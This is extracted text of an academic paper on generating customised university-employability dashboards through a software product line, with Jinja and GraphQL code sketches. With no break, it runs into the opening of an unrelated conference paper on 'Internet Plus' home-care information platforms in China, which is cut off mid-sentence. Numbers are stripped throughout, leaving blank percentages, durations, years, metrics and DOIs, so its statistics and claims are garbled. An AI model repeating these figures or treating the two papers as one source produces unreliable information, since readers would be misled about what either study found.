a diagram of the detailed workflow for generating the source code can be seen in fig. . the code templates for this case study can also be consulted at https://github.com/andvazquez/dashboard-spl-assets (vázquez-ingelmo, ).

results

generated dashboards

as has already been introduced, the observatory collects important datasets to research the employability and employment of graduates from spanish universities. relying on a customizable exploratory tool would increase the chances of discovering interesting patterns or relations within these complex fields. the dashboards of this case study have a series of particular requirements due to the data domain and the specific characteristics of the observatory studies. for instance, the developed data visualizations exploit different
( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://github.com/andvazquez/dashboard-spl-assets http://dx.doi.org/ . /peerj-cs. figure results derived from the first configuration. through this configuration is possible to apply different filters simultaneously to each scatter diagrams to observe how patterns evolve. full-size doi: . /peerjcs. /fig- dimensions of the observatory’s collected variables. also, the generated observatory’s dashboards needed to be connected to the organization’s graphql api (facebook, ) that allow users to retrieve data statistics on demand (vázquez-ingelmo, cruz-benito & garcía-peñalvo, ; vázquez-ingelmo, garcía-peñalvo & therón, a; vázquez- ingelmo, garcía-peñalvo & therón, b; vázquez-ingelmo, garcía-peñalvo & therón, c), decoupling the data resources from the visual components’ logic. in this section, the results derived from the application of the presented dashboard product line within the university employment and employability domain are described. by tuning spl through particular configurations, it is possible to obtain tailored solutions for different requirements and tasks. configuration # . comparison of different values is one of the most relevant tasks regarding the exploration of university employability and employment data. these comparisons could enlighten which factors affect employability and employment to a greater or lesser extent, leading to the possibility of conducting deeper analyses. for example, by configuring a dashboard with two scatter diagrams side by side, it is possible to apply different filters to each one and observe how data patterns evolve (fig. ). also, adding the global reference feature to both diagrams helps to make comparisons by adding a reference line marking the unfiltered and disaggregated values. it is possible to appreciate, for example, that men graduates are more optimistic when commenting opinions about their future wages and the possibility of developing a working career in spain (michavila et al., b). however, these diagrams also allow seeing at a glance that arts and humanities and sciences graduates are more pessimistic about their future than their counterparts in other branches of knowledge, which are more clustered. for instance, only % of sciences women graduates think that they could have a working career in spain within five years. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results derived from the second configuration. the scatter diagram shows the link between different students’ opinions classified by gender. full-size doi: . /peerjcs. /fig- this configuration enables the user to explore data through the combination of different aggregations, variables and filters. configuration # . the previous configuration, however, could be complex for some users by having to control two diagrams at the same time to align different factors. a single scatter diagram could be added to the dashboard to drill-down data. it is possible to add another dimension to the scatter diagram component by mapping numerical variables through the radius of the visualization’s data points. for instance, following the same example of the first configuration, the differences between male and females can be observed by a gender aggregation of the data. in this case, the population of each group is mapped through the radius of the points (fig. ). 
however, to see how the branch of knowledge affects the value of these variables, similarly to the previous configuration, it is necessary to continuously filter data by every single branch (fig. ). this configuration is then not recommendable when continuous, and more complex comparisons (such as the one made in the previous scenario) are required. if, on the other hand, data exploration is not continuously required by a user, the controls could be allocated within a top bar (fig. ) that can be hidden to give more space to the visualizations. configuration # . on the other hand, different pages focused on different data variables or data dimensions could be configured. this functionality allows freedom when arranging the content of the dashboards’ pages to make it understandable for every particular user. in the observatory’s case, a user might prefer having the dashboard screens organized by the study edition, being able to navigate through them thanks to a navigation bar (fig. ). or if preferred, it could be specified that each page will exploit a different set of data variables; for example, having a single tab to explore the students’ competences (fig. ). vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results derived from the second configuration. the scatter diagram shows the link between different students’ opinions classified by gender and filtered by the branch of knowledge, showing only the results related to science students. full-size doi: . /peerjcs. /fig- figure modification of the second configuration to change the controls location. the controls for the scatter diagram are arranged in a bar on top of the visualization. full-size doi: . /peerjcs. /fig- through this view it is possible to see a misalignment between the perceived level that the graduates have about their skills and the perceived level of contribution of the studies regarding the acquisition of that skills, and also between that possessed level and the perceived required level in their job positions (michavila et al., b). vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure dashboard involving different information visualizations. by specifying the layout of the dashboard it is possible to achieve dashboards with different components, each one with its own features. full-size doi: . /peerjcs. /fig- the previous dashboards are a quite tiny set of the available combinations that can be achieved through the spl configuration, but they should serve as an example to show the possibilities of having a framework for generating personalized dashboards. product metrics the metrics for the spl are the following regarding its feature model: • feature model height: • features: • optional features: the number of valid configurations has been omitted, given the recursion of the dashboards’ composition (as highlighted in the dashboard meta-model), so infinite valid configurations can be generated. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure possible layout configuration for comparing students’ skills through different study edi- tions. this configuration can be useful to identify lack of skills at-a-glance or their evolution through time. full-size doi: . /peerjcs. 
regarding the core assets (i.e., the templates' source code), the following metrics have been calculated (el-sharkawy, yamagishi-eichler & schmid, ):
• lines of feature code (lof): , lines of feature code. this metric counts every line of code affected by any jinja directive (i.e., every annotated line of code). it is a size metric that gives a high-level view of the source code associated with the spl features.
• fraction of annotated lines of code (plof): . %. this is a variability density metric, showing that the spl's products share . % of common code ( , lines of code are not annotated).
• scattering of variation points: this metric counts the number of times that a feature appears in the code (i.e., appears in a jinja condition directive). high scattering values decrease the readability of the code. by refactoring the code into macros that contain all the code associated with a specific feature, the scattering is reduced.

figure: simplified gantt diagram of the spl development. the gantt diagram shows each task regarding the spl development, including its contextualization and design.

given the complex domain in which the product line has been applied (i.e., the dashboards' domain), the scattering of the variation points was one of the main concerns, as high scattering would make the code even more complex. that was the reason for arranging the feature code into macros as a solution to address the scattering of variability points.

development time improvement

the development of the presented spl, including its conceptualization and design, took days, as illustrated through a simplified gantt diagram in fig. . the core assets development task includes all the artifacts regarding the spl (i.e., the dsl, the templates, etc.). before implementing this approach, a dashboard template with the same components and kpis was the solution to offer all the results held in the observatory's study, so universities could compare their individual results with the global, aggregated results. the development of that dashboard template took days. however, this static approach limited universities' ability to freely explore their data, as mentioned in other sections. five of the universities were interviewed to capture their dashboard requirements and to estimate the time consumed by the elicitation process. this estimation should be considered speculative given the variable complexity of the elicitation process and, especially, the number of different universities (i.e., users) involved. nevertheless, the requirements elicitation took one day for the interviewed universities. given the project's potential continuity, with the presented spl approach the dashboard implementation process would mainly consume time on requirements elicitation, decreasing the time spent on development. without this approach, the information dashboards implemented for future editions of the observatory's employability study would remain static and generalized for every involved user. building a personalized dashboard consumes resources in terms of requirements elicitation and design, but also in terms of implementation and development.
if the development phases are automated, then the main benefit is not only decreasing the development time of individual dashboards, but also, if necessary, devoting more time to the requirements identification and design phases, which, in the end, are the backbone of well-constructed dashboards. that is why, although significant time was consumed for the implementation of the dashboard spl ( days), it can be seen as an investment for the future, specifically in environments where significant quantities of user profiles are involved. discussion the application of domain engineering and the spl paradigm to identify and factorize information dashboard functionalities has shown its usefulness to generate different dashboards with a set of common assets through the study of the dashboards’ domain. the obtained results are fairly valuable, and open new paths for applying this approach to other data domains with new requirements. dashboards are complex software solutions that could be highly beneficial when adequately designed and tailored for specific users. these products can support decision- making processes, assisting visual analysis by presenting information in an understandable manner. however, the variety of profiles involved in these processes and their different definitions of ‘‘understandable’’ makes the implementation of dashboards a time- and resource-consuming task, since a dashboard configuration that is highly useful for one user could be pointless for the rest of them. what is more, dashboards can be composed of several elements, from simple visualizations to different linked views, cross-filtering capabilities, interaction methods, handlers, etc., thus making the dashboards’ domain a complex domain not only because of the different profiles of potential users, but because of the great quantity of feasible combinations of these ‘‘dashboard elements’’ to build a proper solution. in addition, these features can be very fine-grained; in user-centered systems, a slight modification on visualization types, interaction patterns, layouts, color palettes, etc. could be crucial regarding the final perceived usability of the product. relying on a framework to easily generate information dashboards would allow stakeholders to focus on the information requirements and their refinement to provide better results when seeking valuable insights on large datasets. also, it opens up the possibility to automatically adapt the dashboards’ configurations to match dynamic requirements based on the device used (cruz-benito et al., b) or other factors. the factorization of the dashboards’ components into individual features allow fine- grained reusability and a set of customization options. this fine-grained customization enables the possibility of having highly functional and exploratory-centered visualizations as well as more basic visual components more centered on the explanation of insights through the addition or removal of low-level features. the achieved granularity provides a foundation to develop not only whole visualization components, but also new interaction methods and design features that can be easily interchangeable to fulfill particular sets of user requirements. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. an annotative method of implementation was undertaken using macros to encapsulate individual functionalities. 
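as an illustration of this mechanism, the sketch below defines a jinja template in which each optional feature of a hypothetical scatter diagram (tooltip, zoom) is encapsulated in its own macro, and renders it for a given feature selection; the macro and feature names are illustrative assumptions rather than the actual core assets of the product line, but the structure follows the annotative, macro-based approach described here.

```python
from jinja2 import Environment

# hypothetical core asset: every optional feature lives in its own macro, and the
# base template composes only the macros enabled by the configuration
TEMPLATE = """
{% macro tooltip() -%}
chart.on("hover", showTooltip);
{%- endmacro %}
{% macro zoom() -%}
chart.enableZoom();
{%- endmacro %}
function buildScatter(data) {
  const chart = new Scatter(data);
  {% if features.tooltip %}{{ tooltip() }}{% endif %}
  {% if features.zoom %}{{ zoom() }}{% endif %}
  return chart;
}
"""

env = Environment(trim_blocks=True, lstrip_blocks=True)
template = env.from_string(TEMPLATE)

# feature selection as it would be read from the xml configuration file
print(template.render(features={"tooltip": True, "zoom": False}))
```

rendering the same template with a different feature selection yields a different product, which is, in miniature, what the code generator does when it combines the xml configuration with the core assets.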
this method takes all the benefits of the annotative approach (fine-grained customization) and avoids its code verbosity and scalability issues by dividing the core assets into base templates and macros (kästner & apel, ). other possibilities existed for implementing the variability points, such as superimposition approaches like the featurehouse framework (apel, kastner & lengauer, ; apel & lengauer, ), which did not fulfill the granularity requirements discussed in the materials & methods section, or the xvcl mechanism (jarzabek et al., ), which does fit the feature granularity requirements of this domain. however, the final decision of using a templating engine allowed the direct connection of the designed dsl with the final source code, providing a higher-level language to specify the dashboards' features, as well as the possibility of organizing the variability points into macros to increase readability, traceability and maintainability by having all the code associated with a feature in the same source file. the chosen technology to implement the dsl was xml. the decision to implement the dsl directly in xml was made because of the hierarchical nature of xml and its resemblance to the hierarchical structure of the feature diagram, making the designed dsl a computer-understandable ''translation'' of the feature model for the dashboard generator to process. however, this language may not be as human-readable as other dsl solutions, which can cause issues if non-expert users want to specify their dashboard requirements by themselves. creating a friendly user interface that allows the dashboards' feature selection without direct manipulation of the xml files would be a valuable solution to address these issues and ease the product configuration process in the future. customization at the functionality level has proven to be straightforward, as it is possible to easily vary the behavior of the visual components through the dsl. customization of visual design attributes, however, needs to be addressed in more depth, as only the layout composition can be specified in detail at the moment. the visual customization challenge cannot be overlooked, since dashboards not only have to provide valuable functionality; they should offer that functionality through a pleasant and usable interface (few, ; sarikaya et al., ). on the other hand, this work has addressed customization focused on the presentation layer of dashboards, but with the spl paradigm the architectural design can also be customized in order to provide different functional features regarding data processing, interoperability, storage, performance, security, etc., achieving a completely customizable dashboard solution that does not focus only on the visual presentation. regarding data acquisition, the developed tool was integrated with the observatory's graphql api to provide dynamic data exploration. the connection to this particular type of data source involved the implementation of specific connectors to decouple the visualizations from the particular source. the variability of data sources is another identified challenge to be addressed through this approach, in order to support different data formats and data structures. although counting on a graphql api facilitated data retrieval by unifying data requests, it is essential to enable the specification of other data retrieval methods.
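to show what such a decoupling layer can look like, the sketch below defines a minimal connector interface with one graphql-backed implementation and one static implementation; the endpoint url, the query and the class names are illustrative assumptions and do not correspond to the observatory's actual api or to the connectors implemented for the tool.

```python
import json
import urllib.request

class DataConnector:
    """minimal contract consumed by the visual components: fetch() returns plain data"""
    def fetch(self):
        raise NotImplementedError

class GraphQLConnector(DataConnector):
    """retrieves data from a graphql endpoint (placeholder url and query)"""
    def __init__(self, endpoint, query, variables=None):
        self.endpoint = endpoint
        self.query = query
        self.variables = variables or {}

    def fetch(self):
        payload = json.dumps({"query": self.query, "variables": self.variables}).encode()
        request = urllib.request.Request(
            self.endpoint, data=payload, headers={"Content-Type": "application/json"})
        with urllib.request.urlopen(request) as response:
            return json.load(response)["data"]

class StaticConnector(DataConnector):
    """serves a fixed data set, e.g., for tests or file-derived data"""
    def __init__(self, rows):
        self.rows = rows

    def fetch(self):
        return self.rows
```

a visual component only holds a reference to a connector, so swapping the graphql source for a file-based or rest-based one does not affect the visualization logic.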
product metrics showed that significant feature code was needed to address high customizability of the dashboards ( . % of the source code was annotated). also, arranging the feature code into macros helped to increase features’ traceability as well as to decrease the scattering of the variability points throughout the code, making the code more readable and maintainable. the approach can decrease the development time of individualized dashboards for each involved university. as presented in the results section, the spl not only offered space for development time improvements, but also enabled the capacity of offering customized solutions, which was previously regarded as unviable given the time constraints of the observatory’s project. embracing the spl paradigm can be seen as an investment for the future for projects with a common domain and with continuity over time. finally, it is clear that interesting patterns can be discovered thanks to the application of this dashboard spl on the employability and employment fields. the observatory’s data provide a great context to perform more advanced analyses to enlighten this complex domain. having powerful visualization tools allow reaching insights about patterns or factors to guide the execution of more complex analyses and make decisions about the actions to take or the future research directions, like developing machine learning (ml) models (garcía-peñalvo et al., ). regarding this last field, having visualization tools to explore the input data before training any ml model could help to build better and more accurate models through an appropriate feature selection phase guided by the previously reached insights (hall, ). the main weaknesses and limitations of this solution come from the preliminary nature of the framework; it is crucial to further validate the usability of the automatically generated products to show their usefulness to the main beneficiaries of the dashboards: the users, as well as assess its implementation in other domains. the approach needs to be further generalized to provide a more versatile method and to match also development requirements (available technology or preferred programming languages), although results seem promising. automating the generation of dashboards given their goal, their context, their end users, etc. could be extremely beneficial due to the vast potential of impact that these tools have (sarikaya et al., ). conclusions a domain engineering approach has been applied to the dashboards’ domain to obtain a spl of this type of software solution. by the identification of commonalities and variability points, a dashboard meta-model has been developed as well as a feature model to capture the different customization dimensions of the spl. the spl has been developed through an annotative approach using code templates and macros (forming the core assets of the family of products). a dsl has been designed to facilitate and automate the application engineering process. the configuration files based on the dsl feed a code generator in charge of adding or removing the product features. the presented approach was applied within the spanish observatory for vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. university employability and employment system, to provide a variety of dashboard configurations that enable the exploitation and exploration of different dimensions regarding employability and employment data. 
future research lines will involve refinements of the meta-model and the dsl, usability testing of the obtained products and a/b testing (cruz-benito et al., a; cruz- benito et al., b; kakas, ; siroker & koomen, ) on different configurations. architectural customization could be supported to add more coarse-grained features like a visualization recommendation engine (gotz & wen, ; vartak et al., ; voigt et al., ), interface language translation or data preprocessing techniques before its presentation. finally, the customization levels of the dashboards’ visual design and data sources need to be further addressed. additional information and declarations funding this work was supported in part by the spanish government ministry of economy and competitiveness throughout the defines project (ref. tin - -r), in part by the providedh project, funded within the chist-era programme under the national grant agreement: pcin- - (mineco, spain) and in part by la caixa foundation. the work of a vázquez-ingelmo was supported by the spanish ministry of education and vocational training under an fpu fellowship (fpu / ). there was no additional external funding received for this study. the funders helped with the contextualization of the research. grant disclosures the following grant information was disclosed by the authors: spanish government ministry of economy and competitiveness: ref. tin - -r. chist-era programme: pcin- - . la caixa foundation. spanish ministry of education and vocational training: fpu / . competing interests the authors declare there are no competing interests. author contributions • andrea vázquez-ingelmo conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. • francisco j. garcía-peñalvo and roberto therón conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/- materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: data and assets are available at https://github.com/andvazquez/dashboard-spl-assets. (doi: . /zenodo. ). references albright sc, winston w, zappe c. . data analysis and decision making. mason: cengage learning. almakky h, sahandi r, taylor j. . the effect of culture on user interface design of social media—a case study on preferences of saudi arabians on the arabic user interface of facebook. world academy of science, engineering technology international journal of social, behavioral, educational, economic, business industrial engineering : – doi . /zenodo. . Álvarez jm, evans a, sammut p. . mapping between levels in the metamodel architecture. in: international conference on the unified modeling language. berlin, heidelberg: springer, – doi . / - - - _ . apel s, kastner c, lengauer c. . featurehouse: language-independent, automated software composition. in: proceedings of the st international conference on software engineering. washington, d.c.: ieee computer society, – . apel s, kästner c, lengauer c. . language-independent and automated software composition: the featurehouse experience. ieee transactions on software engineer- ing : – doi . /tse. . . 
apel s, lengauer c. . superimposition: a language-independent approach to software composition. in: international conference on software composition. berlin, heidelberg: springer, – doi . / - - - - _ . bray t, paoli j, sperberg-mcqueen cm, maler e, yergeau f. . extensible markup language (xml). world wide web journal : – . card m. . readings in information visualization: using vision to think. san francisco: morgan kaufmann. chadha d, toner j. . focusing in on employability: using content analysis to explore the employability discourse in uk and usa universities. international journal of educational technology in higher education : doi . /s - - - . clark s. . render your first network configuration template using python and jinja . available at https://blogs.cisco.com/developer/network-configuration-template. clements p, northrop l. . software product lines. boston: addison-wesley. cruz-benito j, sánchez-prieto jc, vázquez-ingelmo a, therón r, garcía-peñalvo fj, martín-gonzález m. a. how different versions of layout and complexity of web forms affect users after they start it? a pilot experience. in: rocha Á, adeli h, reis lp, costanzo s, eds. trends and advances in information systems and technologies. cham: springer, – doi . / - - - - _ . cruz-benito j, vázquez-ingelmo a, sánchez-prieto jc, therón r, garcía-peñalvo fj, martín-gonzález m. b. enabling adaptability in web forms based on user vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/andvazquez/dashboard-spl-assets http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . / - - - _ http://dx.doi.org/ . /tse. . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /s - - - https://blogs.cisco.com/developer/network-configuration-template http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. characteristics detection through a/b testing and machine learning. ieee access : – doi . /access. . . el-sharkawy s, yamagishi-eichler n, schmid k. . metrics for analyzing variability and its implementation in software product lines: a systematic literature review. information software technology : – doi . /se - . elias m, bezerianos a. . exploration views: understanding dashboard creation and customization for visualization novices. in: ifip conference on human-computer inter- action. berlin, heidelberg: springer, – doi . / - - - - _ . ezzat labib awad a. . enforcing customization in e-learning systems: an ontology and product line-based approach. phd thesis, universitat politécnica de valéncia. facebook. . graphql. available at https://facebook.github.io/graphql/ (accessed on july ). fallside dc, walmsley p. . xml schema part : primer second version. cambridge: w c. few s. . information dashboard design. sebastopol: o’reilly media. freeman g, batory d, lavender g. . lifting transformational models of product lines: a case study. in: international conference on theory and practice of model trans- formations. berlin, heidelberg: springer, – doi . / - - - - _ . gabillon y, biri n, otjacques b. . designing an adaptive user interface according to software product line engineering. in: the eighth international conference on advances in computer-human interactions. lisbon, portugal, – . gacek c, anastasopoules m. . implementing product line variabilities. in: acm sigsoft software engineering notes. new york: acm, – . garcía-peñalvo fj. . the third mission. in: education in the knowledge society. vol. . salamanca: universidad de salamanca, – . 
garcía-peñalvo fj, cruz-benito j, martín-gonzález m, vázquez-ingelmo a, sánchez- prieto jc, therón r. . proposing a machine learning approach to analyze and predict employment and its factors. international journal of interactive multimedia and artificial intelligence ( ): – doi . /ijimai. . . . gomaa h. . designing software product lines with uml: from use cases to pattern- based software architectures. boston: addison wesley longman publishing co., inc. gómez a, penadés mc, canós jh, borges mr, llavador m. . a framework for variable content document generation with multiple actors. information and software technology : – doi . /j.infsof. . . . gotz d, wen z. . behavior-driven visualization recommendation. in: proceedings of the th international conference on intelligent user interfaces. new york: acm, – . hall ma. . correlation-based feature selection for machine learning. phd thesis, university of waikato, hamilton, new zealand. hauptmann b, bauer b, harhurin a, pleuss a. . supporting derivation and customization of user interfaces in software product lines using the example of web applications. master’s thesis, technische universität münchen. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /access. . http://dx.doi.org/ . /se - http://dx.doi.org/ . / - - - - _ https://facebook.github.io/graphql/ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /ijimai. . . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /peerj-cs. hillage j, pollard e. . employability: developing a framework for policy analysis. london: dfee london. jarzabek s, bassett p, zhang h, zhang w. . xvcl: xml-based variant config- uration language. in: proceedings of the th international conference on software engineering. washington, d.c.: ieee computer society, – . kakas ac. . a/b testing. in: sammut c, webb gi, eds. encyclopedia of machine learning and data mining. new york: springer. kang kc, cohen sg, hess ja, novak we, peterson as. . feature-oriented domain analysis (foda) feasibility study. pittsburgh: carnegie-mellon university, software engineering institute. kästner c, apel s. . integrating compositional and annotative approaches for product line engineering. in: proc gpce workshop on modularization, composition and generative techniques for product line engineering. – . kästner c, apel s, kuhlemann m. . granularity in software product lines. in: proceedings of the th international conference on software engineering. new york: acm, – . kleppe ag, warmer j, bast w. . mda explained. the model driven architecture: practice and promise. boston: addison-wesley longman publishing co. inc. kramer d, oussena s, komisarczuk p, clark t. . using document-oriented guis in dynamic software product lines. in: acm sigplan notices. new york: acm, – . logre i, mosser s, collet p, riveill m. . sensor data visualisation: a composition- based approach to support domain variability. in: european conference on modelling foundations and applications. berlin, heidelberg: springer, – . marcus a, gould ew. . crosscurrents: cultural dimensions and global web user- interface design. interactions : – doi . / . . marinho fg, lima f, ferreira filho jb, rocha l, maia me, de aguiar sb, dantas vl, viana w, andrade rm, teixeira e. . a software product line for the mobile and context-aware applications domain. in: international conference on software product lines. berlin, heidelberg: springer, – . michavila f, martínez jm, martín-gonzález m, garcía-peñalvo fj, cruz-benito j. . 
barómetro de empleabilidad y empleo de los universitarios en españa, (primer informe de resultados). madrid: observatorio de empleabilidad y empleo universitarios. michavila f, martínez jm, martín-gonzález m, garcía-peñalvo fj, cruz benito j. a. empleabilidad de los titulados universitarios en españa. proyecto oeeu. education in the knowledge society : – doi . /eks . michavila f, martínez jm, martín-gonzález m, garcía-peñalvo fj, cruz-benito j, vázquez-ingelmo a. b. barómetro de empleabilidad y empleo universitarios. edición máster . madrid, españa: observatorio de empleabilidad y empleo universitarios. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /eks http://dx.doi.org/ . /peerj-cs. nascimento lmd. . cores assets development in software product lines-towards a practical approach for the mobile game domain. riga, latvia: lambert academic publishing. pleuss a, botterweck g, dhungana d. . integrating automated product derivation and individual user interface design. in: fourth international workshop on variability modelling of software-intensive systems. linz, austria. pleuss a, hauptmann b, dhungana d, botterweck g. a. user interface engineering for software product lines: the dilemma between automation and usability. in: proceedings of the th acm sigchi symposium on engineering interactive computing systems. new york: acm, – . pleuss a, hauptmann b, keunecke m, botterweck g. b. a case study on variability in user interfaces. in: proceedings of the th international software product line conference-vol. . new york: acm, – . pohl k, böckle g, van der linden fj. . software product line engineering: founda- tions, principles and techniques. new york: springer-verlag new york, inc. quinton c, mosser s, parra c, duchien l. . using multiple feature models to design applications for mobile phones. in: proceedings of the th international software product line conference, vol. . new york: acm, . ridge b, gaspar t, ude a. . rapid state machine assembly for modular robot control using meta-scripting, templating and code generation. in: humanoid robotics (humanoids), ieee-ras th international conference. piscataway: ieee, – . ronacher a. . jinja documentation. available at http://jinja.pocoo.org/docs/ . /: jinja . sarikaya a, correll m, bartram l, tory m, fisher d. . what do we talk about when we talk about dashboards? ieee transactions on visualization computer graphics : – . sboui t, ayed mb, alimi am. . a ui-dspl approach for the development of context-adaptable user interfaces. ieee access : – doi . /access. . . siroker d, koomen p. . a/b testing: the most powerful way to turn clicks into customers. hoboken: john wiley & sons. tufte e, graves-morris p. . the visual display of quantitative information.; . cheshire: graphics press. universities uk, confederation of british industry. . future fit: preparing graduates for the world of work. london: cbi, universities uk. vartak m, huang s, siddiqui t, madden s, parameswaran a. . towards visualiza- tion recommendation systems. acm sigmod record : – . vázquez-ingelmo a. . code repository that supports the research presented in the paper taking advantage of the software product line paradigm to generate customized user interfaces for decision-making processes: a case study on university employability. available at https://github.com/andvazquez/dashboard-spl-assets. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com http://jinja.pocoo.org/docs/ . /:jinja http://jinja.pocoo.org/docs/ . /:jinja http://dx.doi.org/ . /access. . https://github.com/andvazquez/dashboard-spl-assets http://dx.doi.org/ . /peerj-cs. vázquez-ingelmo a, cruz-benito j, garcía-peñalvo fj. . improving the oeeu’s data-driven technological ecosystem’s interoperability with graphql. in: dodero jm, ibarra sáiz ms, ruiz rube i, eds. fifth international conference on technological ecosystems for enhancing multiculturality (teem’ ) (cádiz, spain, october – ( ). new york: acm. vázquez-ingelmo a, garcía-peñalvo fj, therón r. a. application of domain engineering to generate customized information dashboards. in: hci international th conference on human-computer interaction ( - ). las vegas: springer. vázquez-ingelmo a, garcía-peñalvo fj, therón r. b. domain engineering for generating dashboards to analyze employment and employability in the academic context. in: th international conference on technological ecosystems for enhancing multiculturality. salamanca, spain. new york: acm doi . / . . vázquez-ingelmo a, garcía-peñalvo fj, therón r. c. generation of customized dashboards through software product line paradigms to analyse university employ- ment and employability data. in: learning analytics summer institute spain — lasi-spain . león, spain. voelter m, visser e. . product line engineering using domain-specific languages. in: software product line conference (splc), th international. piscataway: ieee, – . voigt m, pietschmann s, grammel l, meißner k. . context-aware recommen- dation of visualization components. in: the fourth international conference on information, process, and knowledge management (eknow). citeseer, – . yorke m. . employability in higher education: what it is-what it is not. heslington, york: higher education academy york. zhang h, jarzabek s, swe sm. . xvcl approach to separating concerns in product family assets. in: international symposium on generative and component-based software engineering. efurt, germany: springer, – . vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. international conference on sensor network and computer engineering (icsnce ) research on information service of home care in internet plus era jie zhao xi’an peihua university xi’an, , china e-mail: @qq.com abstract—in the “internet plus” era, information technology will be applied to the community home-based care services is a new initiative to create wisdom of the pension industry. with the full use of the internet and large data, the new model of home care for the elderly needs the active participation of the social organizations (enterprises), and the correct guidance of the government. strengthening the top-level design of government, establishing the information standard and enhancing the applicability of platform will undoubtedly speed up the informatization construction of home care platform and promote the development of our pension system. keywords-home care internet plus information i. introduction in recent years, with the rapid development of china's economy, the problem of population aging is becoming more and more serious. according to the bulletin of “social service development released by the ministry of civil affairs in ”, as the end of , there are million thousand people with aged of and more, over accounted for . % of the total population in china. 
among them, million thousand people aged and over accounted for . % of the total population. since the s, china has attached increasing importance to the problem of population aging. in december , the state council promulgated the "social pension service system construction plan ( - )", which clearly pointed out that the construction of the social old-age service system should be home-based, community-supported and institution-supported. in february , the " th five-year" national plan for the development of aging services and the pension system set out an old-age service system that is home-based and community-based, with institutions as a supplement and combined with medical support. however, according to survey data from the national aging office, the demand rate of urban home care services in china is only . %. the most prominent problem in home care services is insufficient supply, and the contradiction between supply and demand is outstanding. on march , premier li keqiang first proposed the "internet plus" action plan in the government work report. in april of the same year, the national development and reform commission, the ministry of civil affairs and other departments issued a notice on further improving the development of pension services, making "internet plus pension services" a new course of action. in july of the same year, the state council issued the "internet plus" action guidance, which clearly called for accelerating the development of home-based network information services, promoting the healthy and "smart" development of the pension industry, supporting the innovation and application of intelligent health products, and promoting comprehensive, quantified and healthy new ways of life. accordingly, trials of the "internet plus" mode of home care informatization began throughout the country: community-based pension information service platforms are built on existing internet resources and social forces to provide nursing care, health management and rehabilitation care, and this has gradually become an effective approach to the fundamental problem of insufficient supply of home care services and the resulting contradiction between supply and demand. leveraging "internet plus", with mobile internet terminals as the medium, a community-based information service platform can provide targeted services for the community elderly and meet the various needs of different elderly people. constructing such a home-based care information platform provides convenient information services for the elderly in the community; it can break the time and space constraints of traditional pension services and thereby extend their scope, and it can also bring market and social resources into the construction of the social service system, relieving the problem of insufficient resources for pension services.

ii. home-based care services informatization construction

home care service is a form of service that society provides for old people living at home to solve their daily-life difficulties. as the foundation of china's social pension service system, it has been playing an increasingly important role in pension services and is an important measure for solving the problem of old-age care in china.
however, due to the asymmetric information of service supply, a part of the elderly does not know the home care service and do not know the content of home care services, so it is necessary to build information platform for home care services. the information technology of home care service refers to the integration process of the new generation of information technology based on the mobile internet, internet of things, cloud computing, big data and other internet technologies in the field of home care services. “internet plus community home-based care services” as a new industry is still in the initial stage, in , to promote wide application of the internet, networking and other information technology in the field of community service and pension services, the ministry of civil affairs to determine the first pension service and community service information huimin pilot project units and areas, involving provinces and autonomous region. many of them have been built on the information platform for the old-age service. at present, shanghai, suzhou, lanzhou, qinhuangdao, tianjin, xiamen city has made some useful exploration, have started the home-based care services information platform construction, the establishment of a community home-based care services information platform. there are several pension mode in different city, such as ningbo's mutual aid pension services, the wisdom of xiamen pension, or shanghai city comprehensive service platform for the old in china. home-based care services has made some achievements and accumulated some experience, the typical practice of some of the city's analysis as follows in table . from the "internet plus" home care services in the practice case of china can be seen through the pension information platform to carry out home-based care services to solve the supply and demand information asymmetry, single service and service quality, has great advantages in the field of home-based care services. a. keep up with the development of the times and improve the efficiency of community home care service with the popularity of intelligent terminals in people's daily life, more and more people are used to exchanging and trading on the information platform. in the era of big data, all kinds of information can be effectively integrated in the database, providing great convenience for people's production and life. the construction of community home care information platform is a new mode that is close to people's lifestyle. it can effectively collect all kinds of information and sort out, greatly improving the efficiency of home care services. b. the advantage of buying public service is obvious the government purchase of public services is the community old-age home in the road, the government as a direct provider of services, to address the needs of the elderly home care service part through the purchase of the service, not only can reduce the burden of government staff, also solves the problem of the administration of human resources is not enough, not professional service team, to maximize the integration of community resources, solve the problem of limited government resources. "internet plus" home-based care services with the pension information service platform construction can effectively solve the 